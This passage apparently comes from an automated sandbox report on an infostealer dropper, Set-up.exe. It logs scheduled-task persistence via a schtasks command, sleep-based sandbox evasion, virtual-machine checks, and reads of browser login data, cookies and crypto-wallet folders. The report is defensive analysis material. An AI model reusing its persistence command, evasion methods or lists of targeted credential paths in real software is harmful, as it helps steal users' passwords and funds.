Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3066F3 push edx; mov dword ptr [esp], ebx 4_2_6C306707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3006FD push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30070E push eax; mov dword ptr [esp], ebx 4_2_6C3006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30A777 push eax; mov dword ptr [esp], ebx 4_2_6C30A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310042 push eax; mov dword ptr [esp], ebx 4_2_6C310056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2DE0D0 push eax; mov dword ptr [esp], ebx 4_2_6C396AF6
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\HXocObpYbsjxnCpoVLwZ.dll
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 980
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\Set-up.exe TID: 6412 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2128 Thread sleep count: 980 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2128 Thread sleep time: -98000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local
Source: Set-up.exe Binary or memory string: VMware
Source: Set-up.exe Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveLibrarymetatdummySenhasiduser_data#4user_data#5integrationsOriginREDEngineDataFoldersentryService WorkerMcAfeeScreenPalEpsonFeedsGameDVRUserBenchmarkMovavi Video ConverterVS Revo GroupMovavi Video Editorwebviewuser_dataSavestbs_cache\Hewlett-PackardOISLogishrd.dartServerarduino-ide.arduinoIDEVirtualDJPC ManagerOneDriveGuest ProfilereposiTop Easy DesktopdictionariesSquirrelTempcom.adobe.dunamisMacromediaklnaejjgbibmhlephnhpmaofohgkpgkdaholpfdialjgjfhomihkjbmgjidlcdnoegjidjbpglichdcondbcbdnbeeppgdphefbglgofoippbgcjepnhiblaibcnclgkstoragephantomwalletmonedamonnaie...KeepSolid IncOKmusiWhitehatVpnReasonSaferWebSketchUpF12EAConnect_microsoftEADesktopFPSChessdumpsemojiA7FDF864FBC10B77F8806DD0C461824FAshampooAdguard Software LimitedAdguard_Software_LimitedASUS4kdownload.combluestacks-servicesJxBrowserAuthmailcardfactor%d x %dMicrosoft_CorporationIntel(R)VirtualBoxProgramsblob_storageABBYYChromiumContainerTegraRcmGUIUnrealEngineLauncher.thinkorswimLogiShrdMega LimitedISL Online CacheG HUBlghubWeModGrainemoedathumbnailsAviraD877F783D5D3EF8Cr+bSony CorporationPunkBusterRAV Endpoint ProtectionlinknoweurusdwodlhodlMAGIXVEGAScodecriptIdentityNexusIntegrationNotepad++DBGIsolatedStorageSamsung MagicianHD-Playerhakuneko-desktopBlizzardBattle.netUniSDKODISCLR_v2.0CLR_v2.0_32GamesAGSMy GamesFrontier DevelopmentsfnjhmkhhmkbjkkabndcnnogagogbneecdlcobpjiigpikoobohmabehhmhfoodbbMoises360safeMEmuPC Manager StoreclaveWinampUbisoft Game LauncherAMS SoftwareBlackmagic DesignPhotoWorksNCH SoftwareNitrounknown errorpaint.netMeltytechwindowParams.jsonLogin DataFree_PDF_SolutionsVMwarebitatomProgramDataRufusWindows MediaTypeScriptXboxLiveadspower_global\Docker Desktop\Ledger Live\tof_launcher\Canvadeemixmt-centerThinkBuzanVirtualStorePlaceholderTileLogoFolderApplePlay GamesRobloxPixelSee LLCNeroBGAHelperLibAugLoop3D ObjectsSearchesPublicContinuous MigrationSnapshotsLogsSavedConfigExpressVPNRoute0StreamingVideoProviderOverwolfdiscord.gradlecaches.ipythonHP_Easy_StarttdataCreativeppbibelpcjmhbdihakflkdcoccbgbkpoomaabbefbmiijedngplfjmnooppbclkk3uToolsMarcoMastroddiSWlaunchervshubExcelPowerPointEPSONAMSDKAnkiNoxUnrealEngineWinZipZoomSamsungUI LauncherDevice Metadatagecko_cacheUnityHubTikTok LIVE StudioTeamViewer.thinkbuzanMiniTool Video ConverterDriverPack CloudFlash PlayerResourcedatabasesDawnCacheH}R0}R
Source: Set-up.exe, 00000000.00000002.2324225424.0000000000D75000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveLibrarymetatdummySenhasiduser_data#4user_data#5integrationsOriginREDEngineDataFoldersentryService WorkerMcAfeeScreenPalEpsonFeedsGameDVRUserBenchmarkMovavi Video ConverterVS Revo GroupMovavi Video Editorwebviewuser_dataSavestbs_cache\Hewlett-PackardOISLogishrd.dartServerarduino-ide.arduinoIDEVirtualDJPC ManagerOneDriveGuest ProfilereposiTop Easy DesktopdictionariesSquirrelTempcom.adobe.dunamisMacromediaklnaejjgbibmhlephnhpmaofohgkpgkdaholpfdialjgjfhomihkjbmgjidlcdnoegjidjbpglichdcondbcbdnbeeppgdphefbglgofoippbgcjepnhiblaibcnclgkstoragephantomwalletmonedamonnaie...KeepSolid IncOKmusiWhitehatVpnReasonSaferWebSketchUpF12EAConnect_microsoftEADesktopFPSChessdumpsemojiA7FDF864FBC10B77F8806DD0C461824FAshampooAdguard Software LimitedAdguard_Software_LimitedASUS4kdownload.combluestacks-servicesJxBrowserAuthmailcardfactor%d x %dMicrosoft_CorporationIntel(R)VirtualBoxProgramsblob_storageABBYYChromiumContainerTegraRcmGUIUnrealEngineLauncher.thinkorswimLogiShrdMega LimitedISL Online CacheG HUBlghubWeModGrainemoedathumbnailsAviraD877F783D5D3EF8Cr+bSony CorporationPunkBusterRAV Endpoint ProtectionlinknoweurusdwodlhodlMAGIXVEGAScodecriptIdentityNexusIntegrationNotepad++DBGIsolatedStorageSamsung MagicianHD-Playerhakuneko-desktopBlizzardBattle.netUniSDKODISCLR_v2.0CLR_v2.0_32GamesAGSMy GamesFrontier DevelopmentsfnjhmkhhmkbjkkabndcnnogagogbneecdlcobpjiigpikoobohmabehhmhfoodbbMoises360safeMEmuPC Manager StoreclaveWinampUbisoft Game LauncherAMS SoftwareBlackmagic DesignPhotoWorksNCH SoftwareNitrounknown errorpaint.netMeltytechwindowParams.jsonLogin DataFree_PDF_SolutionsVMwarebitatomProgramDataRufusWindows MediaTypeScriptXboxLiveadspower_global\Docker Desktop\Ledger Live\tof_launcher\Canvadeemixmt-centerThinkBuzanVirtualStorePlaceholderTileLogoFolderApplePlay GamesRobloxPixelSee LLCNeroBGAHelperLibAugLoop3D ObjectsSearchesPublicContinuous MigrationSnapshotsLogsSavedConfigExpressVPNRoute0StreamingVideoProviderOverwolfdiscord.gradlecaches.ipythonHP_Easy_StarttdataCreativeppbibelpcjmhbdihakflkdcoccbgbkpoomaabbefbmiijedngplfjmnooppbclkk3uToolsMarcoMastroddiSWlaunchervshubExcelPowerPointEPSONAMSDKAnkiNoxUnrealEngineWinZipZoomSamsungUI LauncherDevice Metadatagecko_cacheUnityHubTikTok LIVE StudioTeamViewer.thinkbuzanMiniTool Video ConverterDriverPack CloudFlash PlayerResourcedatabasesDawnCacheH}V0}V
Source: Set-up.exe, 00000000.00000003.2309002492.0000000001455000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2324509023.000000000144F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838220618.0000000001455000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838327408.0000000001455000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000002.2324509023.00000000013FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_006F8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 4_2_006F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_006F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_006F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 4_2_006F13C9
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3484D0 cpuid 4_2_6C3484D0
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 4.2.service123.exe.6c2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2307441720.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR
Source: Set-up.exe String found in binary or memory: Electrum BTCP
Source: Set-up.exe String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.2324225424.0000000000D75000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: nRAnkamaLGHUBH:I:BitBox WalletTrezor WalletTelegramTelegram ()atomic\Local Storage\leveldb\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\Desktop\Profiles\\User Data\\Opera Software\no errorundefined errortoo many filesfile too largeunsupported methodunsupported encryptionunsupported featurefailed finding central directorynot a ZIP archiveinvalid header or archive is corruptedunsupported multidisk archivedecompression failed or archive is corruptedcompression failedunexpected decompressed sizeCRC-32 check failedunsupported central directory sizeallocation failedfile open failedfile create failedfile write failedfile read failedfile close failedfile seek failedfile stat failedinvalid parameterinvalid filenamebuffer too smallinternal errorfile not foundarchive is too largevalidation failedwrite callback failedtotal errors
Source: Set-up.exe String found in binary or memory: Jaxx Liberty
Source: Set-up.exe String found in binary or memory: \Exodus\backup
Source: Set-up.exe String found in binary or memory: Exodus Eden
Source: Set-up.exe String found in binary or memory: Ethereum (UTC)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7100, type: MEMORYSTR